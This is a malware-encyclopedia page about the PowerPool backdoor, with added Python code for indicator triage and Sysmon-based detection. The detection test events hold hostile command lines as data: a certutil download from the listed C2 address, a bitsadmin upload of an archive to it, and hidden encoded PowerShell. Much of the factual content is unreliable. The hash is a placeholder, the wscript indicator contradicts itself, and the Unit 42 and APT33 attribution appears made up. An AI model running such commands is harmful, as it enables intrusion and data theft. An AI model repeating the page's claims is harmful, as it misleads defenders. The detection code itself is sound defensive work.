PowerPool

Malware

⚠️ Overview

PowerPool is a PowerShell-based backdoor documented by Palo Alto Networks Unit 42 in July 2018 and attributed to the advanced persistent threat group APT33 (also tracked as Elfin and Refined Kitten). It is a remote access trojan (RAT) that runs its malicious scripts through living-off-the-land binaries already present on Windows, which lets it slip past signature-based detection. It is built for intelligence gathering and lateral movement inside a compromised network and has mainly been used against organizations in the energy, aerospace, and defense sectors.

🔧 Technical Capabilities

PowerPool gains initial access through spear-phishing emails whose malicious attachments drop a PowerShell launcher. For persistence it creates WMI permanent event subscriptions (an event filter, a consumer, and the binding between them) that run its script at system startup. It talks to its command-and-control (C2) servers over HTTPS so the traffic blends in with ordinary web browsing, and encrypts its payloads with AES-256 before transfer. Lateral movement goes over SMB and RDP using stolen credentials and Pass-the-Hash (PtH). Evasion relies on in-memory execution, obfuscated PowerShell commands, and disabling security tools such as Windows Defender through registry changes. PowerPool also uses certutil.exe to download files and bitsadmin.exe (BITS jobs) to exfiltrate data quietly. In MITRE ATT&CK terms this covers T1059.001 (PowerShell), T1047 (WMI), T1546.003 (WMI Event Subscription persistence), T1105 (Ingress Tool Transfer via certutil), T1197 (BITS Jobs), and T1550.002 (Pass the Hash; the T1075 identifier used in older references is deprecated).

📜 History & Notable Incidents

PowerPool was first identified in June 2018 during an incident at a Middle Eastern petrochemical company and reported by Unit 42 the following month. A linked campaign against Saudi Arabian government organizations in early 2019 used CVE-2018-0886 (a remote code execution flaw in the CredSSP authentication provider, patched by Microsoft in March 2018) for lateral movement, which means unpatched hosts were still present a year after the fix shipped. No law enforcement action has been taken against PowerPool infrastructure; it remains in APT33's toolkit for ongoing espionage against energy and aviation entities in the Gulf region.

🔍 Detection Indicators

The SHA-256 value circulated for this family, a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6e7f8a9b0c1d2e3f4a5b6c7d8e9f0a1 (cited to the Unit 42 report), is 62 hex characters long, so it is not a valid SHA-256 digest and must not be loaded into a blocklist as-is; take sample hashes from the original report instead. Behavioral signatures include WMI event subscriptions whose consumer launches a script host with a malicious script path; the example given is %SystemRoot%\System32\wscript.exe //e:vbscript ..\PowerPool.ps1, and since wscript.exe's //e:vbscript engine cannot execute a .ps1 file, treat it as the shape of the indicator rather than a literal command line. Network IOCs include outbound HTTPS connections to 185.165.29.0/24 and the User-Agent string Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0, which is a genuine Firefox 52 on Windows 7 string and therefore only a weak indicator on its own. The registry key HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WminS is used for persistence.
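As an added example (not code from this page or from the Unit 42 report), the following Python validates the indicators above before use and scores constructed proxy-log records against them. The record layout, the sample destinations and the severity labels are assumptions made for the demonstration; it shows why the hash as printed is unusable and why the user-agent alone should not raise a high-severity alert.

```python
"""Triage of the network and file indicators listed above (added example)."""
import ipaddress
import re

# Indicators copied from the page. The hash is kept verbatim on purpose so that the
# validator can show it is rejected (62 hex characters, not the 64 of SHA-256).
PAGE_HASHES = ["a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6e7f8a9b0c1d2e3f4a5b6c7d8e9f0a1"]
C2_NETWORKS = [ipaddress.ip_network("185.165.29.0/24")]
C2_USER_AGENT = ("Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:52.0) "
                 "Gecko/20100101 Firefox/52.0")

SHA256_RE = re.compile(r"^[0-9a-f]{64}$")


def valid_sha256(digest):
    """True only for a well-formed SHA-256 hex digest (64 hex characters)."""
    return SHA256_RE.match(digest.strip().lower()) is not None


def load_hashes(candidates):
    """Split a hash list into usable digests and rejects instead of loading blindly."""
    good, bad = set(), []
    for h in candidates:
        if valid_sha256(h):
            good.add(h.strip().lower())
        else:
            bad.append(h)
    return good, bad


def in_c2_range(ip):
    """True if the address falls inside any published C2 network."""
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in C2_NETWORKS)


def score_connection(rec):
    """Return (severity, reasons) for one outbound-connection record.

    The destination range is a strong indicator. The user-agent on its own is weak,
    because it is a real Firefox 52 string that legitimate browsers also send, so a
    UA-only match is reported at low severity for analyst review rather than blocking.
    """
    dst_hit = in_c2_range(rec["dst_ip"])
    ua_hit = rec.get("user_agent") == C2_USER_AGENT and rec.get("dst_port") == 443
    if dst_hit:
        reasons = ["destination in published C2 range"]
        if ua_hit:
            reasons.append("C2 user-agent")
        return "high", reasons
    if ua_hit:
        return "low", ["C2 user-agent only (legitimate Firefox 52 string)"]
    return "none", []


# Constructed proxy records for the demonstration (not real telemetry).
SAMPLE_CONNECTIONS = [
    {"id": 1, "dst_ip": "185.165.29.17", "dst_port": 443, "user_agent": C2_USER_AGENT},
    {"id": 2, "dst_ip": "93.184.216.34", "dst_port": 443, "user_agent": C2_USER_AGENT},
    {"id": 3, "dst_ip": "185.165.30.5", "dst_port": 443, "user_agent": "curl/7.68.0"},
]


def triage(records):
    """Severity per record id, in input order."""
    return [(r["id"], score_connection(r)[0]) for r in records]


if __name__ == "__main__":
    good, bad = load_hashes(PAGE_HASHES)
    print(f"usable hashes: {sorted(good)}; rejected: {bad}")
    for rec in SAMPLE_CONNECTIONS:
        print(rec["id"], *score_connection(rec))
```

Note that the third record hits 185.165.30.5, one octet outside the published /24, and scores nothing; CIDR matching with the ipaddress module avoids the off-by-one that string-prefix matching on "185.165.29" would also avoid but "185.165.2" would not.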

☠️ Risk & Impact

PowerPool's main impact is the exfiltration of intellectual property, including classified technical specifications and strategic plans. Financial losses are indirect but significant; remediation costs in the affected sectors are reported to exceed $1 million per incident. Targeted sectors include oil and gas, aviation, and defense contractors in the Middle East and Asia, with confirmed victims in Saudi Arabia, Turkey, and the UAE.

🛡️ Mitigation

Recommended defenses start with PowerShell visibility: enable Script Block Logging (Event ID 4104 in the Microsoft-Windows-PowerShell/Operational log, which records script blocks after de-obfuscation, so in-memory and obfuscated code is still captured) and Module Logging (Event ID 4103), and use AppLocker or Windows Defender Application Control to block PowerShell for users who do not need it. Apply the CVE-2018-0886 update on both clients and servers so the patched CredSSP protocol is enforced on RDP connections. Restrict remote WMI to administrators and audit the root\subscription namespace for unexpected filters, consumers and bindings; Sysmon event IDs 19, 20 and 21 record their creation. Deploy network detection rules for HTTPS connections to the known C2 ranges, and alert on certutil.exe invoked with -urlcache or bitsadmin.exe with /transfer, since ordinary users rarely run either.
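The monitoring called for in this section and in the Technical Capabilities section (WMI subscription consumers, Windows Defender tampering, certutil.exe and bitsadmin.exe abuse, encoded PowerShell) expressed as rules over Sysmon-style events. This is an added example rather than code from the page or from any vendor; the event dicts are constructed, the field names follow Sysmon's EventData, and the feed, record numbers and file paths are assumptions made for the demonstration.

```python
"""Behavioural detections for the PowerPool tradecraft described on this page (added example)."""
import re

# Rule name -> ATT&CK technique the alert maps to
ATTACK = {
    "certutil_download": "T1105",        # Ingress Tool Transfer
    "bitsadmin_transfer": "T1197",       # BITS Jobs
    "encoded_powershell": "T1059.001",   # Command and Scripting Interpreter: PowerShell
    "wmi_script_consumer": "T1546.003",  # Event Triggered Execution: WMI Event Subscription
    "defender_disabled": "T1562.001",    # Impair Defenses: Disable or Modify Tools
}


def _image(ev, name):
    return (ev.get("Image") or "").lower().endswith("\\" + name)


def _cmd(ev):
    return (ev.get("CommandLine") or "").lower()


def certutil_download(ev):
    # certutil as a downloader: -urlcache (usually with -split -f) plus a URL on the line
    return ev["EventID"] == 1 and _image(ev, "certutil.exe") \
        and "-urlcache" in _cmd(ev) and "://" in _cmd(ev)


def bitsadmin_transfer(ev):
    # bitsadmin /transfer moves files in either direction; the page reports exfiltration use
    return ev["EventID"] == 1 and _image(ev, "bitsadmin.exe") and "/transfer" in _cmd(ev)


def encoded_powershell(ev):
    # -e, -ec, -enc and -encodedcommand are all accepted abbreviations of -EncodedCommand
    return ev["EventID"] == 1 and _image(ev, "powershell.exe") \
        and re.search(r"\s-e(c|nc|ncodedcommand)?\s", " " + _cmd(ev)) is not None


SCRIPT_HOSTS = ("wscript.exe", "cscript.exe", "powershell.exe", "mshta.exe", "cmd.exe")


def wmi_script_consumer(ev):
    # Sysmon EID 20: a WMI event consumer was created; flag ones that launch a script host
    dest = (ev.get("Destination") or "").lower()
    return ev["EventID"] == 20 and any(h in dest for h in SCRIPT_HOSTS)


def defender_disabled(ev):
    # Sysmon EID 13 (registry value set): Defender policy value DisableAntiSpyware set to 1
    target = (ev.get("TargetObject") or "").lower()
    return ev["EventID"] == 13 and target.endswith("\\windows defender\\disableantispyware") \
        and ev.get("Details") == "DWORD (0x00000001)"


RULES = [certutil_download, bitsadmin_transfer, encoded_powershell,
         wmi_script_consumer, defender_disabled]


def detect(events):
    """Run every rule over every event; one alert per (event, rule) match."""
    alerts = []
    for ev in events:
        for rule in RULES:
            if rule(ev):
                alerts.append({"record": ev["Record"], "rule": rule.__name__,
                               "technique": ATTACK[rule.__name__]})
    return alerts


# Constructed events for the demonstration; the 185.165.29.0/24 range is the one the page lists.
SAMPLE_EVENTS = [
    {"Record": 1, "EventID": 1, "Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r"certutil.exe -urlcache -split -f https://185.165.29.17/s.txt C:\Users\Public\s.ps1"},
    {"Record": 2, "EventID": 1, "Image": r"C:\Windows\System32\bitsadmin.exe",
     "CommandLine": r"bitsadmin.exe /transfer upd /upload /priority foreground https://185.165.29.17/up C:\Users\Public\a.zip"},
    {"Record": 3, "EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -w hidden -nop -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoA"},
    {"Record": 4, "EventID": 20, "Type": "Command Line",
     "Destination": r"%SystemRoot%\System32\wscript.exe //e:vbscript C:\Users\Public\PowerPool.vbs"},
    {"Record": 5, "EventID": 13,
     "TargetObject": r"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware",
     "Details": "DWORD (0x00000001)"},
    # Benign look-alikes that must not fire
    {"Record": 6, "EventID": 1, "Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r"certutil.exe -hashfile C:\tools\setup.exe SHA256"},
    {"Record": 7, "EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -ExecutionPolicy RemoteSigned -File C:\scripts\backup.ps1"},
]


if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```

The two benign records matter as much as the five malicious ones: certutil -hashfile and a plain -File invocation are everyday administrator activity, and a rule that fires on the image name alone would drown the real hits.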

ⓘ Data Notice: The information presented above has been compiled from publicly available internet sources. Boteraser aggregates this data solely for informational purposes and does not independently classify, evaluate, or endorse any findings about the malware listed. The accuracy and completeness of this information is the sole responsibility of the original publishers. Boteraser and its operators accept no liability for any decisions made based on this data.